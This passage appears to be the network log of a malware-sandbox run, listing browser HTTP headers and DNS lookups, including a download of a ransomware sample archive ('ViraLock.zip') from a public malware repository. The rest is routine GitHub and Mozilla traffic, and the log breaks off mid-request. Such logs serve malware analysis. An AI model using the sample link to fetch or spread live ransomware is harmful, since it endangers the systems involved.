                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 177
                          x-github-request-id: C31B:3BC911:17BF9B:1BCCD7:6797C1E1
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/ViraLock.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/ViraLock.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-us
                          DNS
                          shavar.prod.mozaws.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          shavar.prod.mozaws.net
                          IN A
                          Response
                          shavar.prod.mozaws.net
                          IN A
                          35.80.96.249
                          shavar.prod.mozaws.net
                          IN A
                          54.148.39.91
                          shavar.prod.mozaws.net
                          IN A
                          52.11.251.64
                        • flag-us
                          DNS
                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                          IN A
                          Response
                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                          IN A
                          34.149.97.1
                        • flag-us
                          DNS
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          IN A
                          Response
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          IN A
                          34.160.144.191
                        • flag-us
                          DNS
                          prod.ads.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.ads.prod.webservices.mozgcp.net
                          IN A
                          Response
                          prod.ads.prod.webservices.mozgcp.net
                          IN A
                          34.117.188.166
                        • flag-us
                          DNS
                          prod.remote-settings.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.remote-settings.prod.webservices.mozgcp.net
                          IN A
                          Response
                          prod.remote-settings.prod.webservices.mozgcp.net
                          IN A
                          34.149.100.209
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                          IN AAAA
                          Response
                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                          IN AAAA
                          2600:1901:0:74e4::
                        • flag-us
                          DNS
                          shavar.prod.mozaws.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          shavar.prod.mozaws.net
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          prod.ads.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.ads.prod.webservices.mozgcp.net
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          IN AAAA
                          Response
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          IN AAAA
                          2600:1901:0:92a9::
                        • flag-us
                          DNS
                          prod.remote-settings.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          prod.remote-settings.prod.webservices.mozgcp.net
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          209.205.72.20.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          209.205.72.20.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          172.214.232.199.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          172.214.232.199.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          215.156.26.20.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          215.156.26.20.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          github.githubassets.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.githubassets.com
                          IN A
                          Response
                          github.githubassets.com
                          IN A
                          185.199.110.154
                          github.githubassets.com
                          IN A
                          185.199.109.154
                          github.githubassets.com
                          IN A
                          185.199.108.154
                          github.githubassets.com
                          IN A
                          185.199.111.154
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/light-7aa84bb7e11e.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/light-7aa84bb7e11e.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Fri, 20 Dec 2024 22:10:04 GMT
                          etag: "0x8DD21430E2A5E74"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 1123919
                          x-served-by: cache-iad-kcgs7200067-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 16, 15791
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: f11bfc5223661919fd4e0670bd4eeaf8826a3ce7
                          content-length: 7898
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/dark-f65db3e8d171.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/dark-f65db3e8d171.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Thu, 19 Dec 2024 13:51:50 GMT
                          etag: "0x8DD203449ADEFDF"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 1123916
                          x-served-by: cache-iad-kjyo7100075-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 23, 15946
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: db9adb2e57083f891973f33ff0cd8294628b33a6
                          content-length: 7985
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/primer-primitives-d9abecd14f1e.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/primer-primitives-d9abecd14f1e.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Tue, 14 Jan 2025 14:54:01 GMT
                          etag: "0x8DD34AB487C4930"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 1123919
                          x-served-by: cache-iad-kcgs7200108-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 24, 16100
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 38060b773b701fd3c31b092f00feb6aa6db4a441
                          content-length: 2608
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/primer-93aded0ee8a1.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/primer-93aded0ee8a1.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Wed, 15 Jan 2025 23:39:42 GMT
                          etag: "0x8DD35BDE28E1C20"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 932135
                          x-served-by: cache-iad-kiad7000067-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 17057
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 8da0df1d5068ba8a6870af3f443e8faaa10b87b4
                          content-length: 39273
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/global-d579f4a5b443.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/global-d579f4a5b443.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Tue, 21 Jan 2025 15:44:16 GMT
                          etag: "0x8DD3A32768821EB"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 520350
                          x-served-by: cache-iad-kcgs7200161-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 29, 17466
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 7af14cf2fef99922b242d1a04ae38737dd7d6214
                          content-length: 38163
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/github-8049f990d299.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/github-8049f990d299.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Thu, 23 Jan 2025 00:57:09 GMT
                          etag: "0x8DD3B48DD72F969"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 324337
                          x-served-by: cache-iad-kcgs7200085-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 72, 10376
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 21c4d75a28eede56b1133dc68f4920dc4c6d3800
                          content-length: 21345
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/repository-6372f70837d3.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/repository-6372f70837d3.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Mon, 20 Jan 2025 12:21:22 GMT
                          etag: "0x8DD394CF3C2CD2A"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 615631
                          x-served-by: cache-iad-kcgs7200061-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 9, 14379
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: be958671a6a859af86f6de557ca91db22e885f3c
                          content-length: 5184
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/code-0210be90f4d3.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/code-0210be90f4d3.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Fri, 17 Jan 2025 17:06:48 GMT
                          etag: "0x8DD37195443E4FE"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 853540
                          x-served-by: cache-iad-kjyo7100163-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 10, 10642
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 822d3eba2543ee3a797516736062b6607f4bc03a
                          content-length: 5189
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/wp-runtime-763ea7117943.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/wp-runtime-763ea7117943.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Mon, 27 Jan 2025 08:21:42 GMT
                          etag: "0x8DD3EABA14C971D"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 10355
                          x-served-by: cache-iad-kiad7000037-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 34, 869
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 9e9cf36c1421e943a237db3670adda935e3914bb
                          content-length: 14249
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 12 Nov 2024 14:39:55 GMT
                          etag: "0x8DD0327E029647C"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 1167518
                          x-served-by: cache-iad-kiad7000023-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 8, 14812
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: ca760a5a310f8f6d4666babc22c2fb6e2b9b7b0d
                          content-length: 3080
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-d7e6bc799724.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-d7e6bc799724.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 05 Dec 2024 15:49:16 GMT
                          etag: "0x8DD15445FBFE222"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 1167518
                          x-served-by: cache-iad-kiad7000130-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 11, 14980
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 0a20df4edaabc897958426aa40cb71d08782ae69
                          content-length: 4848
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-038efa22f8cd.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/ui_packages_failbot_failbot_ts-038efa22f8cd.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:26 GMT
                          etag: "0x8DD34DA6B45CD54"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:20 GMT
                          age: 932135
                          x-served-by: cache-iad-kiad7000156-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 16467
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 1675322e37e5452fb437a911e7cefdb220d00683
                          content-length: 3635
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/environment-e300f3d2aeda.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/environment-e300f3d2aeda.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Mon, 20 Jan 2025 15:48:59 GMT
                          etag: "0x8DD3969F4700ECF"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 527811
                          x-served-by: cache-iad-kjyo7100038-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 2, 17621
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: c5fc2f70eba7795b2d359e78cec42ed96d345916
                          content-length: 781
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Thu, 08 Aug 2024 18:12:13 GMT
                          etag: "0x8DCB7D5A12F8D41"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 1167518
                          x-served-by: cache-iad-kiad7000168-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 5, 14808
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 597d3f7d5dd56e0ba47fcab38989fb4cffa94931
                          content-length: 3284
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
